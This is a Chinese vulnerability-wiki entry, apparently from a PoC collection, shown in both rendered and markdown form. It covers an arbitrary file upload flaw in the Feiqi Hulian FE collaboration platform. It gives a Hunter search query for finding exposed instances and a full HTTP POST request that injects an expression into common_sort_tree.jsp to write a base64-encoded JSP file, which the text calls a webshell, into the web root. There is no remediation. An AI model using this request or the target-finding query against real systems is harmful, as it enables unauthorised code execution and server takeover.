fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台common_sort_tree存在任意文件上传漏洞

一、漏洞简介

飞企互联FE业务协作平台common_sort_tree存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
特征

四、漏洞复现

其中红圈为webshellbase64编码

POST /common/common_sort_tree.jsp;.js HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=DDA007F5B06EF7B049214B54838A17F8
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

rootName={%25Thread.@fe.util.FileUtil@saveFileContext(new%20java.io.File("../web/fe.war/stc.jsp"),new%20sun.misc.BASE64Decoder().decodeBuffer("PCUgb3V0LnByaW50bG4oMTExKjExMSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg=="))%25}

上传文件位置

/stc.jsp;.js

原文: https://www.yuque.com/xiaokp7/ocvun2/pc3ep5ur1cxxkf9h

# 飞企互联FE业务协作平台common_sort_tree存在任意文件上传漏洞

# 一、漏洞简介
飞企互联FE业务协作平台common_sort_tree存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"`
- 特征

![image.png](./img/KS9JoiXELy_yv_7x/1692266465639-4e39b2e2-11b3-413b-a119-1c569b2deb21-136253.png)

# 四、漏洞复现
其中红圈为`webshell`base64编码
```
POST /common/common_sort_tree.jsp;.js HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=DDA007F5B06EF7B049214B54838A17F8
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

rootName={%25Thread.@fe.util.FileUtil@saveFileContext(new%20java.io.File("../web/fe.war/stc.jsp"),new%20sun.misc.BASE64Decoder().decodeBuffer("PCUgb3V0LnByaW50bG4oMTExKjExMSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg=="))%25}
```
![image.png](./img/KS9JoiXELy_yv_7x/1700809694250-ca337d3a-e8ca-4655-9dba-e4bba73d0710-579751.png)
上传文件位置
```
/stc.jsp;.js
```
![image.png](./img/KS9JoiXELy_yv_7x/1700809726376-da2e69f3-1ece-40cc-947d-4723770a8b8d-616380.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pc3ep5ur1cxxkf9h>